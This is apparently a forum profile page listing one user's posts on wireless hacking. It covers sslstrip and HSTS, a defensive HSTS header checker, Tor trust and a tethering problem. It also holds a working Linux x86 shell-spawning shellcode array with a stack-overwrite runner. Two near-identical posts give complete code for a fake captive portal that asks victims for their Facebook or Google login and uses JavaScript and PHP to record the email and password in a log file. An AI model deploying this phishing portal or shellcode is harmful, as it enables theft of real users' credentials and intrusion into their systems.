Posts posted by sud0nick

  1. Browsers these days use HTTP Strict Transport Security (HSTS) which prevents attacks from sslstrip. I have only been able to make it work with Safari on a MacBook. SSLStrip+ apparently defeats HSTS but I have not tried it personally. You could probably set up an evil access point with Kali Linux on a Raspberry Pi and run SSLStrip+ to get the results you want.
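    As an added example (not part of the post above), a small Python checker that parses a Strict-Transport-Security header per RFC 6797 and reports the policy gaps that still leave a browser exposed to the downgrade HSTS is meant to stop; the one-year threshold is the value the HSTS preload list requires.

```python
import re

# Minimum max-age the HSTS preload list requires (one year, in seconds).
PRELOAD_MIN_MAX_AGE = 31536000


def parse_hsts(header_value):
    """Parse a Strict-Transport-Security header value into a dict.

    Returns None if the header is absent or malformed. Directive names are
    case-insensitive and a directive must not appear more than once.
    """
    if header_value is None:
        return None
    directives = {}
    for part in header_value.split(";"):
        part = part.strip()
        if not part:
            continue
        name, sep, value = part.partition("=")
        name = name.strip().lower()
        if name in directives:
            return None  # duplicate directive makes the header invalid
        directives[name] = value.strip().strip('"') if sep else True
    if "max-age" not in directives or not re.fullmatch(r"\d+", str(directives["max-age"])):
        return None
    directives["max-age"] = int(directives["max-age"])
    return directives


def assess_hsts(header_value):
    """Return a list of findings for a site's HSTS policy (empty list = strong)."""
    policy = parse_hsts(header_value)
    if policy is None:
        return ["no valid HSTS header: every first visit and every expired visit is strippable"]
    findings = []
    if policy["max-age"] == 0:
        findings.append("max-age=0 removes the policy from the browser")
    elif policy["max-age"] < PRELOAD_MIN_MAX_AGE:
        findings.append("max-age below one year: policy expires too soon and fails preload rules")
    if "includesubdomains" not in policy:
        findings.append("includeSubDomains missing: subdomains can still be served over plain HTTP")
    if "preload" not in policy:
        findings.append("preload missing: the very first visit is unprotected until the browser learns the policy")
    return findings
```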

  2. So do you tend to code your shellcode instructions in assembly first, or C, or do you just know what machine instructions do what? I kinda know in theory how an exploit works, just haven't ever made one from start to finish completely. Shell code seems to be the last hurdle (that and reversing).

    You typically write your shellcode instructions in assembly first. The C program you need will inject the shellcode (in hex format) into memory. Here is an example of shellcode in a C array:

    /* Linux x86 (32-bit) shellcode stored as a C byte array. */
    char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x99\xb0"
                       "\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
                       "\x2f\x2f\x73\x68\x2f\x62\x69\x6e"
                       "\x89\xe3\x51\x89\xe2\x53\x89\xe1"
                       "\xcd\x80";

    int main(void) {
        int *ret;
        /* Point ret at main's saved return address on the stack and
         * overwrite it with the address of the array, so the bytes run
         * when main returns. This only works for a 32-bit build with an
         * executable stack and no stack protector. */
        ret = (int *)&ret + 2;
        (*ret) = (int)shellcode;
    }

    I also wrote a C program a few years back, called sheller, to automatically take a .bin file and dump the hexcode into a C array in either a C or C++ program. You can check it out here: https://forum.intern0t.org/c-c/3791-sheller.html

    The only dependency required for sheller is hexdump.

    *EDIT: If you are a C guy and check out my program, I know it uses the goto and system functions. I was new to programming back then. Nevertheless, the program works.

  3. Shellcode can be difficult and it may take awhile to study it. Essentially, it is the hex version of machine instructions, written in assembly, that gives an attacker access to a shell by exploiting a vulnerability in a program. This means your code will have to be tailored to the processor architecture you are working with as each architecture consists of different instruction sets. After you write the assembly code you will need to create the hex version of it (this is the shellcode) and place it in a C program that can inject the code into memory. A good guide is The Shellcoder's Handbook (http://www.amazon.com/The-Shellcoders-Handbook-Discovering-Exploiting/dp/047008023X) and I'm sure you can find some information online.

  4. Hi Darren, I see that you recommend Tor, and I like the concept of Tor, but I also read that the NSA targets it and that it is also primarily funded by the US government, so how can I have any trust in it?

    I've heard about this, too. It actually came up when I was taking the Certified Ethical Hacker course and I feel it can't truly be trusted.

  5. Posting this here because newbi3 asked me to. This goes outside the scope of the support for Evil Portal so don't ask any questions about it here. This is strictly for everyone's information.

    For those having issues using PHP I have a solution I discovered today. If you place your PHP, JavaScript, and CSS files in the /www directory you can import them into the splash.html page by using your Pineapple's IP address that is also recorded in the preauthenticated_users area of the Evil Portal configuration. Here are some examples of how I got an Ajax call to send the username and password entered by a victim to an auth.php script and log it to auth.log.

    Within splash.html

    <script src="//172.16.42.1/nodogsplash/jquery.min.js"></script> 

    As you can probably guess in /www I created a new directory called nodogsplash and placed my jquery.min.js file there. This way when the splash.html page tries to access it on behalf of the victim it doesn't return the splash.html page code (due to a redirect not allowing the user past the captive portal). This same method can be applied to your PHP scripts.

    <script>
        $(function() {
            $("#submit_button").on("click", function() {
                var email_addr = $('#email').val();
                var pass = $('#password').val();
                if (email_addr == "" || pass == "") {
                    alert("Please login with your Facebook or Google account to access free Wi-Fi.");
                    return;
                } else {
                    $.ajax({
                        type: "POST",
                        url: "//172.16.42.1/nodogsplash/auth.php",
                        data: {email: email_addr,
                               password: pass},
                        dataType: 'json',
                        success: function(data, textStatus, jqXHR) {
                            window.location.href="$authtarget";
                        },
                        error: function(data, textStatus, errorThrown) {
                            window.location.href="$authtarget";
                        }
                    });
                }
            });
        });
    </script>

    In the code above I first perform a check to ensure the victim has entered their username and password then send the data off to my auth.php script in /www/nodogsplash where it is logged in auth.log. Right now it authenticates the user regardless of whether the call to auth.php was successful or not but I'll change that soon.

    And just for the purpose of completion here is my auth.php script so you can see exactly what is happening when the AJAX call is made.

    <?php

    if (isset($_POST['email'])) {
        $fh = fopen('auth.log', 'a+');
        fwrite($fh, "Email:  " . $_POST['email'] . "\n");
        fwrite($fh, "Pass:  " . $_POST['password'] . "\n\n");
        fclose($fh);
        return;
    } else {
        header('Location: splash.html');
    }

    ?>

    I have tested this and it works for me so I hope this helps everyone who is having trouble with using JavaScript and PHP in nodogsplash.

  6. I'm having some trouble getting out to the internet with my Pineapple while it is tethered to my Sprint GS4. While the phone is connected to my home router via WiFi the Pineapple can ping 8.8.8.8 just fine. Once I change the connection to 4G LTE the Pineapple can no longer ping 8.8.8.8. I have performed many different tests and have yet to solve this problem. Any help is appreciated.

    Extra info:

    1. Using the Ping & DNS app on the GS4 I have verified that my phone can get out to the internet (view attachment).

    2. The Pineapple can ping both IP addresses shown in the network info of the phone and I have tried setting the default gateway of the Pineapple to both of these addresses as well as the address of its own usb0 interface.

    3. Something strange I came across is if I try to ping google.com or facebook.com from the Pineapple it resolves the IP but it still can't ping out.

    4. I have also run the appropriate iptables commands from other guides even though, if I understand correctly, that is simply to route clients out to the internet. I should still be able to ping 8.8.8.8 from the Pineapple without this modification.

  7. I know this topic is a little old now but I recently bought a Mark V and started playing with this awesome infusion yesterday. For those having issues using PHP I have a solution I discovered today. If you place your PHP, JavaScript, and CSS files in the /www directory you can import them into the splash.html page by using your Pineapple's IP address that is also recorded in the preauthenticated_users area of the Evil Portal configuration. Here are some examples of how I got an Ajax call to send the username and password entered by a victim to an auth.php script and log it to auth.log.

    Within splash.html

    <script src="//172.16.42.1/nodogsplash/jquery.min.js"></script>

    As you can probably guess in /www I created a new directory called nodogsplash and placed my jquery.min.js file there. This way when the splash.html page tries to access it on behalf of the victim it doesn't return the splash.html page code (due to a redirect not allowing the user past the captive portal). This same method can be applied to your PHP scripts.

    <script>
        $(function() {
            $("#submit_button").on("click", function() {
                var email_addr = $('#email').val();
                var pass = $('#password').val();
                if (email_addr == "" || pass == "") {
                    alert("Please login with your Facebook or Google account to access free Wi-Fi.");
                    return;
                } else {
                    $.ajax({
                        type: "POST",
                        url: "//172.16.42.1/nodogsplash/auth.php",
                        data: {email: email_addr,
                               password: pass},
                        dataType: 'json',
                        success: function(data, textStatus, jqXHR) {
                            window.location.href="$authtarget";
                        },
                        error: function(data, textStatus, errorThrown) {
                            window.location.href="$authtarget";
                        }
                    });
                }
            });
        });
    </script>

    In the code above I first perform a check to ensure the victim has entered their username and password then send the data off to my auth.php script in /www/nodogsplash where it is logged in auth.log. Right now it authenticates the user regardless of whether the call to auth.php was successful or not but I'll change that soon.

    And just for the purpose of completion here is my auth.php script so you can see exactly what is happening when the AJAX call is made.

    <?php

    if (isset($_POST['email'])) {
        $fh = fopen('auth.log', 'a+');
        fwrite($fh, "Email:  " . $_POST['email'] . "\n");
        fwrite($fh, "Pass:  " . $_POST['password'] . "\n\n");
        fclose($fh);
        // Return a JSON body so the jQuery call (dataType: 'json') reaches its success callback.
        echo json_encode(array("key", "val"));
        return;
    } else {
        header('Location: splash.html');
    }

    ?>

    I have tested this and it works for me so I hope this helps everyone who is having trouble with using JavaScript and PHP in nodogsplash.
